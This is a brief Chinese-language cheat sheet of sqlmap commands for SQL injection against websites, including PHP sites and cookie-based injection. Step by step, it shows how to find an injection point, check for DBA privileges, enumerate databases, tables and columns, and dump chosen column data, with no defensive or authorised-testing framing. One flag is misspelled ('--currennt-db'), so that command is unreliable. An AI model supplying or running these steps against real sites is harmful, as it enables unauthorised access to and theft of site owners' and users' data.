1.sqlmap -u 网址
-u 检测是否存在注入点 返回数据库的名字
2.sqlmap -u 网址 --tables 列出全部表(猜解模式)
3.sqlmap -u 网址 --columns -T “表名” (- columns猜列名 –T表名)
4. sqlmap -u 网址 --dump -C “列名,列名” -T “表名” (dump下载数据 –C“”列名)
SQLMAP 及PHP网站渗透
1.sqlmap -u 网址
2.sqlmap -u 网址 --is-dba(测试是否是dba权限)(是dba权限可以直接写文件)
3. sqlmap -u 网址 --dbs 列出所有数据库
4. sqlmap -u 网址 --currennt-db 查找自己的数据库
5. sqlmap -u 网址 --tables –D “当前数据库名” 查询所有数据表名 根据当前数据库查询
6. sqlmap -u 网址 --columns -T “表名” -D “数据库名”
7. sqlmap -u 网址 --dump -C “列名,列名” -T “表名” -D“数据库名”
SQLMAP之cookie注入
1. sqlmap -u 网址(去掉id=xx) --cookie “id=xx” --level 2
--cookie “”这里写ID的参数如果是cookie注入,就要把的等级提升为2
2. sqlmap -u 网址(去掉id=xx) --tables --cookie“id=xx”--level 2
3. sqlmap -u 网址(去掉id=xx)--columns -T“表名” --cookie“id=xx”--level 2
4. sqlmap -u网址(去掉id=xx)--dump -C“列名,列名” -T“表名” --cookie “id=xx” --level 2